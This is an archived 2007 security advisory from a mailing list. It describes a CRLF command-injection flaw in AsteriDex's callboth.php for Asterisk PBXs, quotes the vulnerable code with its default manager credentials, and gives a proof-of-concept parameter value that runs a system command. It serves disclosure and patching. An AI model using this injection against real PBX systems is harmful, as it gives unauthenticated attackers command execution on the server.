Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] AsteriDex Code Execution (Asterisk and Trixbox)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] AsteriDex Code Execution (Asterisk and Trixbox)
Date: 9 Jul 2007 15:44:33 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  AsteriDex Code Execution (Asterisk and Trixbox)
------------------------------------------------------------------------


SUMMARY

 <http://bestof.nerdvittles.com/applications/asteridex/> AsteriDex is "a 
digital rolodex for Asterisk / Trixbox PBXs". There is a command injection 
vulnerability which allows unauthenticated users to  execute arbitrary 
commands on the Asterisk management console. Such access permits execution 
of arbitrary operating system commands as the 'asterisk' user.

DETAILS

Vulnerable Systems:
 * AsteriDex version 3.0 and prior

The script 'callboth.php' is used by AsteriDex to bridge a VOIP call 
between two end-points. Insufficient parameter checking is done on the 
variables IN and OUT, allowing a malicious user to inject arbitrary 
commands into the Asterisk management console.

The script works by logging into the console server on port 5038/TCP on 
localhost. It then issues an 'Action: Originate' command which is used to 
setup the bridged call. The relevant code from callboth.php is:

  fputs ($fp, "Action: login\r\n");
  fputs ($fp, "Username: phpagi\r\n");
  fputs ($fp, "Secret: phpagi\r\n");
  fputs ($fp, "Events: off\r\n\r\n");
  sleep(1) ;
  fputs ($fp, "Action: Originate\r\n");
  fputs ($fp, "Channel: $IN\r\n"); << Command injection
  fputs ($fp, "Context: custom-callboth\r\n");
  fputs ($fp, "Exten: $OUT\r\n"); << Command injection
  fputs ($fp, "Priority: 1\r\n\r\n");

$IN is set from $_GET['IN'] with no sanity checking other than a test of 
string length; all strings passed to $IN must be less than 100 chars, 
including the string 'sip/' which is prepended to $IN prior to the length 
check.

Given sane values of $IN=123, $out=321 and $CallerID=567, the session 
would look like this:

  Action: login
  Username: phpagi
  Secret: phpagi
  Events: off
  
  Action: Originate
  Channel: 123
  Context: custom-callboth
  Exten: 321
  Priority: 1

By including CRLF characters in $IN, an attacker can inject arbitrary 
commands into the data stream, hijacking the authenticated session to run 
commands of the attackers choice. Take, for example, a $IN string 
containing:
190@example.com\r\nApplication: System\r\nData: echo pwn3d > 
/tmp/hoku.txt\r\n

This would transform the session into:
  Action: login
  Username: phpagi
  Secret: phpagi
  Events: off
  
  Action: Originate
  Channel: 190@example.com
  Application: System
  Data: echo pwn3d > /tmp/hoku.txt
  
  Context: custom-callboth
  Exten: 321
  Priority: 1

This would use the call manager's 'System' functionality to execute 
user-supplied operating system commands, in this case writing the word 
"pwn3d" to a file called "/tmp/hoku.txt". The rest of the session would 
fail because the attacker has subverted the original 'Action', rendering 
the remaining commands meaningless to the manager.

Solution:
A patched version of AsteriDex is available from:  
<http://bestof.nerdvittles.com/applications/asteridex/> 
http://bestof.nerdvittles.com/applications/asteridex/

Disclosure Timeline:
06/25/2007 - Vendor contacted.
06/03/2007 - Vendor contacted again, response received. Details sent to 
vendor.
06/03/2007 - Patch issued and updated version available.
06/05/2007 - Advisory released.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:carl@hoku.co.uk> Carl 
Livitt.
The original article can be found at:  
<http://www.hoku.co.uk/advisories/asteridex.txt> 
http://www.hoku.co.uk/advisories/asteridex.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] AsteriDex Code Execution (Asterisk and Trixbox), SecuriTeam <=
Previous by Date:  [NEWS] SAP Message Server Heap Overflow, SecuriTeam
Next by Date:  [UNIX] Maia Mailguard Arbitrary Code Execution, SecuriTeam
Previous by Thread:  [NEWS] SAP Message Server Heap Overflow, SecuriTeam
Next by Thread:  [UNIX] Maia Mailguard Arbitrary Code Execution, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]